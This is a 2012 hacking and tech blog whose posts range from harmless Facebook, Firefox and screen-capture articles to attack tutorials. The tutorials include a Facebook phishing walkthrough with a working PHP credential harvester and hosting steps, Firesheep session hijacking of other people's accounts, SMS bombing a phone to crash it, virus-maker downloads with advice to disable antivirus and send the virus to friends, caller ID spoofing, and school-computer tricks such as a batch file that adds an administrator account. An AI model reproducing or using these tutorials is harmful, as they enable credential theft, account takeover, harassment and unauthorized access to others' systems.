alexa

Player created by Inbound Now - Social Media Tools.

Wednesday, December 26, 2012

Facebook Reviews Your Year at a Glance


Facebook is chronicling your 20 most important moments of the year 2012 which includes your life events, posts and most popular stories.







If you visit Facebook.com/yearinreview you’ll quickly see the top 20 moments of your year, though it’s unclear how Facebook is making these decisions.

In addition to all these, you will also get to know how many friends you made and also how many pages you liked.

Facebook also introduced a feature called Facebook stories. Got a story about an extraordinary way that you’ve used Facebook? Submit it to Stories, and FB may publish it in an upcoming installment. click here to Submit Story.

Another interesting feature released is the Midnight Message Delivery.
Wish friends a happy new year with a private message that will be delivered to their Facebook inbox at midnight on December 31. Click here to get started.
0 comments
Read More

Saturday, November 3, 2012

Even You Can Hack Facebook / Gmail with Session Hijacking


When we login into a website, we normally proceed by submitting our username and password. Then the server checks its database to match this information and if it finds it, sends a 'cookie' (a small piece of data) and stores into the user's web browser.

Usually websites encrypt the cookies containing the initial login but most of the time, everything else is left un-encrypted. This leaves the cookie vulnerable to session hijacking attacks.
Session Hijack is when an attacker gets access to a user's cookie which allows them to do anything the real user can do on that specific website.
In a wireless internet connection, like the WiFi, these cookies are basically shouted through the air making it even more vulnerable for the users and even easier for the attacker to hijack.

How to hijack:

Programmer Eric Buttler has come up with a firefox extension called Firesheep which does exactly this but only with the ease of a button click. Click "Start Capturing" and the app starts to eavesdrop for any un-encrypted cookie that it may find in the network.

Step 1: Install Firesheep from this link: http://codebutler.github.com/firesheep
Immediately after installation you will notice a new sidebar pop-up.



Step 2: Click on "Start Capturing" and within sometime you will be shocked to notice the number of unsecure cookies which it cracked.


Step 3: Just as the list appears in your sidebar, you may click on any of the usernames and instantly you gain access to that website.


Even though it may sound cool to tryout yourself, just think how un-secure your own accounts are over a public network.

Follow these steps to protect yourself from the Firesheep Session Hijack Attack

1. Use http(secure) i.e., https://www.facebook.com to login.
This simple practice transmits your login information through an encrypted connection thus providing protection.

2. Another way is by using a VPN or Virtual Private Network.

Have you tried Firesheep? How was your experience? let us know. Share this post if you enjoyed reading.



Note: The Firesheep plugin has been created only to demonstrate the possibilities of session hijacking. Eavesdropping maybe a serious charge in some parts of the world.

0 comments
Read More

Saturday, July 28, 2012

How to Hack Facebook using Phishing ~ 2012


Note: Phishing is illegal. This tutorial is only for educative purposes.


Facebook Phishing 2012

Well firstly i will be breifing what phishing is for those who are currently unaware of it.
According to Wikipedia, Phishing is attempting to acquire information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication.

In facebook phishing, the attacker creates a fake page resembling Facebook.com where victims enter their passwords and id's in order to login. By the time the page loads and redirects the victim to the original facebook page, his/her password and id gets saved in the attackers web server.

Now we will go straight into the tutorial segment.
Well we will be actually needing two files in this whole tutorial

1. A php file called login.php. This php file plays the cheif role in extracting and storing the password.
2. Index.html which is the edited fake page and is very similar to the original fb homepage.

Step 1. Creating the php file

Open notepad and  paste the following lines there... and save it with name login.php


<?php
header ('Location: http://www.facebook.com/appcenter');
$handle = fopen("facebook.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Step 2.Creating Index.html Page

Firstly open Facebook.com in your browser. After it loads completely, save it to a folder.


Facebook Phishing 2012

Open the .html\.htm file you just downloaded, using notepad and go to Edit>Find and type in the search box:
method="post" and press Find.


Facebook Phishing 2012

When the searched keyword is shown, notice that just before it, there is something written like: action="www.facebook.............". Replace the text within the quotes with login.php.(See the Image)
Facebook Phishing 2012

Bingo !! Your Phishing page is now ready !

Step 3. Uploading Files to Free Web Hosting

Now you have to upload the above mentioned files in an online web hosting provider.
For this tutorial, I will be using www.000webhost.com.

a. Firstly go to the site and signup for a free account.


000webhost free webhosting

b. After you have created your account, go to Control Panel>File Manager.


file manager

c. Navigate and go to the root folder and delete if you find any pre-existing files.

d. Now click "Upload" and select the two files, namely index.html and login.php

~~ Now you are ready to strike ~~

e. Now copy the link of sub-domain you selected while registering for the hosting account and give it to the victim. Whenever someone tries to login through your phishing page, the username and password is saved in a text file in your file manager(see step b).

Facebook Phishing page

Well I also included a video tutorial for those who are still not very sure about the steps:



How to Hack Facebook using Phishing ~ 2012 - 1080p HD from Siwalik Mukherjee on Vimeo.
0 comments
Read More

Monday, July 9, 2012

5 Fun things To Do on School Computers


SCHOOL COMPUTER PICTURE STUDENT SITTING IN-FRONT OF PC

I know it has been a while after my last article, so sorry guys for that.

Today I will be happy to tell you that my article is all about School computers! Because they're just too easy to hack and do fun stuff with, especially because teachers are just so incompetent with technology sometimes.

1. Be a Javascript Troller

There are so many types of crazy and annoying things you can probably do with Javascript, and all you need in order to do some of these things is just a text editor and a web browser. So, for this script, open up Notepad or something of the like and type the following:

SCHOOL COMPUTER GRAPHICS
<html>
<head>
<title>Lol i troll u</title>
<script type="text/javascript">
function troll() {
alert('Lol i trolled u!');
troll();
}
</script>
</head>
<body onLoad="troll()">
<center>
<img src="http://upload.wikimedia.org/wikipedia/en/7/78/Trollface.svg" />
</center>
</body>
</html>

So what do you do with this code? Save it as trolled.html or anything else as long as it ends with .html and not .txt. Copy it onto someone else's computer when they're not looking (i.e. put it on a USB stick and open it up from there.) Then, quickly leave the vicinity before they look back.
So, what does this code do? Basically, it creates a function called troll() which makes a popup and then does troll() again, and that new troll() makes a popup and calls troll(), and that new troll makes a popup that calls troll()..... It's a never-ending circle. Once you click "ok", a new alert pops up. The only way out is to force-quit the web browser (open up the Task Manager and end a process for Windows, or just force-quit normally for Mac.) As an added bonus, the page has the trollface as a background.

2. Crash a Computer using Flash and Google

Yep, it's actually quite easy to do. Open up a new flash document. Open up the Actions panel for the stage of the first frame. If it's in Actionscript 2, write the following:

onEnterFrame = function ()
{
    getURL("http://www.google.com", "_blank");
}

Or if it's actionscript 3 write the following:

function openGoogle(e:Event):void
{
navigateToURL("http://www.google.com", "_blank");
}
stage.addEventListener(Event.ENTER_FRAME, openGoogle);

Press Control-Enter when you're ready to crash your computer. What this does is repeatedly open up new tabs of Google. But it opens so many Google tabs every second that after maybe 20-30 seconds your computer will barely be able to respond to you mouse clicks or even mouse movements. Usually, any attempt to stop it will result in processing overload and cause the computer to freeze. The only real way to stop this is to force-quit BOTH flash.exe and iexplorer.exe. Some teachers may know enough to do this, but might accidentally close explorer.exe

3. Promote your Account

Want to be an administrator? No big deal. Open up Notepad. Type in the following:

@echo off
net user USERNAME PASSWORD /add
goto admin

:admin
@echo off
net localgroup administrators USERNAME /add
pause


Although, you have to replace USERNAME with whatever your username is and PASSWORD with a password. Save the file as n00b.bat or as anything else .bat and NOT .txt. Navigate to the directory where you saved the file, and double-click it to run it. Once that's done, log out, then log back in again. You're now an admin for that specific machine!
Note: This may or may not work if they have disabled the command prompt. If they have, sorry folks, but you're out of luck for this one. You can still become an admin by using various software if you're really desperate.

4. Do Something Neat with the Scroll-Lock Key

It's usually useless... UNTIL NOW! Note: This only works on XP machines.

1.   Start > Run. Type in "regedit" and click "OK".
2.   Go to KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\i8042prt\Parameters by using the dropdowns in the sidebar.
3.   Edit > New > DWORD Value. Set the name to CrashOnCtrlScroll.
4.   Right-click on this newly created value and click on Modify
5.   Enter the number 1 in the Value data field and click on OK.
6.   Close regedit and reboot your system.
7.   Now you can blue screen (crash) your system by holding the right CTRL key and pressing "Scroll Lock" twice. It's bluescreeneriffic!

5. Write a Virus that Doesn't Do Anything but Scares Your Friends

Open notepad. Type this:

@echo off
echo OMFG YOU GOT A VIRUS.
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
echo It will now begin to delete your files.
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
echo Do you want to abort the deletion of your files?
pause
echo Wow you really fell for that. Pressing a key made the virus delete your account.
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
echo deleting.......
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
pathping localhost -q 2 -p 250 > nul
echo YOU'VE BEEN FOOLED. THERE IS NO VIRUS. YOU'RE JUST A TROLLED F***.
pause

Save this as cool_game.bat or anything else that ends in .bat and sounds like it's NOT a virus. This way, you can give a friend the file, and make them run it and then scare them silly. It's pretty entertaining.

Warning !!!

Seriously, don't do these if someone is watching. They may be fun, but it's easy for someone to monitor your account. If they catch you, well, then you're screwed.

0 comments
Read More

Tuesday, June 19, 2012

So.cl is Microsoft's new Social Network Experiment


Microsoft just took a step forward in the competition against Facebook and Google+ with  So.cl, Microsoft's new social networking site.

So.cl from Microsoft

Pronounced "Social", the site shows you your friends' searches and interests. It lets you have Video Parties with your friends too.


But it also seems that So.cl has takes inspirations from many sites. For example, in So.cl you can choose people to follow, just like Twitter, follow specific categories like in Pinterest and the Video Party looks much like Google+'s Hangout. 

To the contrary, instead of 'like' (Facebook style), Microsoft allows you to add a smile to others' posts.

Microsoft says, Socl "is an experimental research project, developed by Microsoft’s FUSE Labs, focused on exploring the possibilities of social search for the purpose of learning."

According to Microsoft's description of So.cl, it would appear that a big part of Socl is the idea of merging social networking and search.

So.cl from Microsoft
Looking at the “Everyone” feed, it’s easy to see what all So.cl users are searching for and sharing with the world. But Finally !!! One of the biggest problems with “social search” is that we don’t always want to see what everyone else is searching for or the vice-versa

So.cl porn


At present So.cl (link= http://www.so.cl) allows you to join it's network signing in via you Facebook or Microsoft Live accounts. In-case you have some trouble, let me know so that i can send invitations to you.

Socl siwalik techtreck.in

Already on So.cl ? We are eager to know what you think about it. Comment and let us know.
0 comments
Read More

Friday, June 1, 2012

How to make your own SMS Bomber for FREE [VIDEO]

sms bomber techtreck.inSMS Bombing, as the name suggests, is a procedure to bombard a victims cell phone with multiple text messages with the primary intention to crash his cell phone or maybe to play a prank on him. 

Follow the below steps or the Video tutorial below to make your own SMS Bomber. 
There are many tutorials on the internet which shows you how to create an sms bomber using python or other programming languages. Those may be a bit complex for a majority of the people who read my blog so i decided to show you the easiest way to sms bomb a number which uses the iMacros plugin.


Prank quotient: High
Difficulty level: Low

Step 1: Download iMacros

iMacros is a browser extention program where you record a work (like filling a form etc.) and then set how many times you want to replay it to redo that task again and again.

The iMacros extension is available for Google Chrome, Firefox and also Internet Explorer. 
(Download it here)

Step 2: Create free SMS Account

Create a free account on the online websites like www.160by2.com , www.way2sms.com etc. which allows you to send text messages from your Computer to a number.

Step 3: Record the Macro

Enable the iMacro recorder and send an sms to a number. This will record the task you performed and will ask you to save it. Then select the task from the iMacro menu and select the number of times to you want to play it to '999' and just click on Play Loop.

Step 4: SMS Bomb launched

Congratulations, you have successfully started an infinite loop of sending the same text message to your friend over and over again. Soon his phone will crash after his phone memory drains out.

If you have any doubts or questions, watch the tutorial video below or let me know via comment.




0 comments
Read More

Monday, May 28, 2012

3 Hacks to speed up Firefox Drastically

Firefox has been the most downloaded internet browser for almost 5 years now. It is fast, flexible and secure moreover it also allows you to indulge yourself to a few millions of plugins that it offers.
If you landed here looking for tricks to speed up your Firefox, Bingo !! You are in the right place. Trying out the below given tweaks will make your experience with Firefox even greater.

Reduce the amount of Memory Firefox uses for it’s cache

1. Open up your browser (Firefox obviously) and type “about:config” in the address bar.
Once again click the “I’ll be careful I Promise” warning button to open a long list of configurable preferences.

2. Find “browser.sessionhistory.max_total_viewer

3. Set it’s value to 0(Zero)

Reduce Memory usage by 10 times when Firefox is minimized

Normally Firefox consume a huge amount of the RAM memory even when it is minimised. Use these tweaks to reduce memory usage by nearly 10 times when you minimise Firefox.
1. Open up your browser again and type “about:config” in the address bar.

Once again click the “I’ll be careful I Promise” warning button to open a long list of configurable preferences.

2. Right Click within the page and select New>Boolean.

3. Type the following in the box will opens up config.trim_on_minimize and press Enter.

4. Now click on true and after closing restart the browser.


Increase your RAM's ability to accommodate more packet transfer


1.   Open up your browser again and type “about:config” in the address bar.Once again click the “I’ll be careful I Promise” warning button to open a long list of configurable preferences.

2.   In the same config page, scroll down to the line that says network.http.pipelining . Double click on it to set it to "true".

3.   Next, we will increase the maximum pipeline requests to 100. Find the line that says network.http.pipelining.maxrequests. Double click on it, and a dialog box will pop up. Change the setting from 4 to 100.

4.   Next you just need to close your browser and reopen it. That's all, and it will immidiately boost your speed by 30-40%.
0 comments
Read More

Friday, May 18, 2012

How to Create your Own Virus using Virus Maker

Many of us have a preconceived idea that one needs to know programming languages like C, C#, Java etc. to create deadly viruses. Today I will tell you about some wonderful virus maker apps that allows you to create your very own virus and that too with just a few clicks of mouse.


In this tutorial I'll be telling about the 3 most popular and effective virus makers which are all pretty easy to use too. They are Terabit Virus Maker JPS Virus Maker and Necro Virus Maker.



Prank Quotient: High
Difficulty Level: Low

Steps Required (steps are same for all the virus makers given above)


1. Download the virus makers from the following link and run them. Note: Your antivirus may detect these applications as viruses as they contain hacking codes, so just ignore them or disable your antivirus while you create the worm.


download links:
Terabit Virus Maker + JPS Virus Maker
Necro Virus Maker


Now after you download and run any of these applications, you will see screens like these:


Terabit Virus Maker


JPS Virus Maker


Necro Virus Maker


2. Now select some of the given options depending on the type of prank you want to play.
3. Now select an Icon for the virus so that it looks real.
4. Select a name for the virus as this new name is being displayed in processes and people can't distinguish normally.

5. Now click on the Make Virus button to create the virus.
6. Now its time to send it to a friend and play some cool pranks on them.
0 comments
Read More

Monday, May 14, 2012

Top Five Screen Capture Apps


Screen capture applications are particular software tools that help to capture what you see on the screen and save them as images. This is a very handy tool for web designers and developers and anybody who wants to capture important information that is displayed on screen. 

Even though Microsoft now bundles their very own screen capture tool called Snipping Tool with Windows, there are a number of third party tools in the market which has so much to offer.

We have compiled a list of the top 5 screen capture applications are that have received good reviews from the users worldwide.

Screen hunter (click here)

Screen hunter is a free application that is very useful for capturing a full screen or an active window. 
The user interface is very simple so operating this software is piece of cake. The users also have the option of selecting a single hot key to take the take the screen capture which makes it convenient for a user. The features and operations are complete hassle free and easy to use. 
However, there is one major drawback as PNG format is not supported. You also need to pay in case you to upgrade to the premium version.

Shotty (click here)

This is a full-featured (free) screen shot taking tool that is used by a lot of people. It has the ability to capture the Aero-Glass effect in Windows 7 and Windows Vista which enables the user to get HQ screenshots. It has a number of useful features like cropping, captioning and inserting text. 
Some users have complained that PNG compression is not good although there are no complaints with the high quality images.


Gadwin printscreen (click here)

This is a flexible screen capture tool that is equipped with sophisticated features, a user-friendly interface and settings that are fully customizable for short keys. There is no built-in image editor which is a real drawback. But this application is compatible with Windows NT 4, Windows 7 and Windows 2003. The application works seamlessly with no hiccups during its operation.

Ashampoo Snap 5 (click here)

Ashampoo Snap 5 is so far my most favourite screen capture tool. It allows the users to make the screen shot of an active screen quite easily. The best feature of this tool is that it allows you making a snapshot of the content and you can upload the result to Facebook. By this way, you will be able to get feedback in the form of comments and likes in quick time. Its updated tools option allows the user to edit and design the screenshots quite easily. 
Moreover, it is easier to make screenshots for presentations, manuals or internet and to capture the menu tree. Its advance recording feature not only records screen-shots but even record movie of your desktop, record the webcam with mic for creating video greetings etc. 
Additionally, it has features like, restructured tool bars for improved workflow, easier accessible configuration options for all tools, improved tools supporting rotation and transparency and watermarking for screenshots and captured videos.

Screenr (click here)

Screenr is different from all the above apps that I've mentioned so far as it works on the cloud. Screenr is a web-based and cool looking screen capture tool having options to add captions and highlight or make a short movie by capturing what is playing on the screen. 

It is a very attractive application but at the same time very simple to use. The major advantage of this tool is the instant sharing capability. You can log in via Twitter or Facebook account and can record anything on your computer screen up to 5 minutes. Morover if you record your screen, the recording can also be downloaded in MP4 format. 
As you can see there are five leading screen capture applications that have its advantages and limitations. The final choice depends on the user. He needs to ask himself why needs particular software and where he wants to apply it.


What Screen Recorder do your use? Let us know in the comment box below.


 Margaret
About the Guest Author:
Margaret is a blogger by profession. She loves writing on environment and technology. Beside this she is fond of books. She recently did an article on ecofriendThese days she is busy in writing an article on gizmowatch.
0 comments
Read More

Wednesday, May 9, 2012

Remove any Virus using Ubuntu

Removing Virus using Ubuntu

Microsoft Windows is supposed to be the most commonly used operating system in every home. The reason behind this can possibly be because of its user friendly interface and the easy installation of various software applications. This eventually results in being prone to frequent virus attacks followed by severe damages to the computer. 

There are certain viruses that tend to corrupt the system files of the Windows. The computer crashes during reboot and tends to auto shut down every time the system restarts. Thus, using Ubuntu is the only solution to remove viruses in such a condition.

Before getting started

It is necessary to detect and diagnose the infection before opting for the Linux therapy. The antivirus programs might be of some help in case of infections. But it is true that the majority of the antivirus programs available in the modern day market are often not capable to detect highly infectious viruses. Some critical attacks might even resist any kind of antivirus software installation to the infected system. So, using Ubuntu can then be the only way to secure the computer.

Why opt for Ubuntu

Ubuntu can be a best friend when all the defensive weaponries to save a Windows fail to offer a perfect shield to the computer system. 

A CD image of Ubuntu is easy to download from the respective website. Ubuntu is free to use and can also be readily downloaded using the bit torrent. A bit torrent download is fast and easy to opt for. Once the CD image is downloaded it can be burnt to a disk for further usage.

Commencing operation

The Ubuntu CD is to be inserted to the infected computer’s ROM drive. Once the Ubuntu CD is inserted the system must to be rebooted. An antivirus software application can now be used to run a thorough scan in order to detect any malicious object hidden around the deepest core of the system files. If any such existence is detected the software can readily get rid of the item and secure the respective file. The user can also locate the existence of weird file sets and shortcuts which might eventually have replicated itself due to the virus attack. Running the Ubuntu can lead to the permanent disposal of such objects from the infected system.

Things to be noted

virus
As the Linux based Ubuntu operating system runs directly from the system memory there will not be any trace of it once the system is secured and restarted. Ubuntu can effectively remove the harmful viruses from a Windows PC but it does not ensure that the system is absolutely secured from further threats and attacks. Windows operating system is always at the verge of massive virus attacks and thus proper security measures must be obtained.

The reason behind Ubuntu’s success is that the virus applications fail to run in a Linux system. On the other hand a virus hides itself in the deepest sectors of a Windows PC and gets undetected. But when the Ubuntu runs on the same system the same virus fails to respond and can then be easily removed using a potential antivirus program. Being an application to run directly from the RAM, Ubuntu is very useful and indeed a friend in need during a massive Windows breakdown.




 Margaret
About the Guest Author:

Margaret is a blogger by profession. She is also very fond of books. She recently wrote articles on most expensive painting and new Swift.
0 comments
Read More

Sunday, May 6, 2012

What is the State Of The Internet

Hi Friends, I have a wonderful discovery for you today ! I just came over this site called OnlineSchools.org.  This website gives some of the coolest info graphics I've see lately on The State of the Internet.


The site consists of a number of cool info graphics on internet statistics like Social Network dominance, Internet Enemies, Qualities Worldwide.


So I recommend every internet freak out there to check it, I bet you will like the fun facts section much.

click below to launch website.




0 comments
Read More

Tuesday, May 1, 2012

How to Spoof Caller ID

Caller ID Spoofing has been on the news for quite sometimes now. While caller ID spoofing is considered illegal at many countries, there may be some 'very high' prank quotient involved in this.

What is Caller ID Spoofing

caller id spoofingSuppose Louis 's girlfriend is Kate. And John (Kate's friend) wants to play a prank on her by calling her from Louis's phone number.
Now this is where caller ID spoofing enters the scene.

By caller ID spoofing you can call to any number and make the call appear like coming from any number you want.

Moreover some online services even offer extra features like call recording and changing voice pitch.

How to Spoof Caller ID

In the past half-a dozen years, hundreds of websites have originated which serve the purpose of Spoofing one's caller ID.

While there are many trial and paid services online like spoofcard.com and spooftel.com, today i'll be telling you the best one among them according to me and it is also very very easy.www.CrazyCall.net is the website i am talking about.
I will show a screen shot of the site which will make it clear.

How it works / How to use CrazyCall

CrazyCall.com is very easy to use. 

Firstly you have to visit the website www.crazycall.net (Isn't this obvious?)

Next, choose your country, enter the number you want to display on the victim's phone and the victim's phone number.

You also get an option to choose your Voice Pitch (changes your voice pitch in real-time.)

And you are done.
Next you will need to call one of the two numbers provided from your phone
(prefer your land phone or maybe your dad's phone as these lines are international numbers) and enter the code you are provided when you are prompted to.

Please share this article with your friends of you liked it. Thanks.
0 comments
Read More
Powered by Blogger.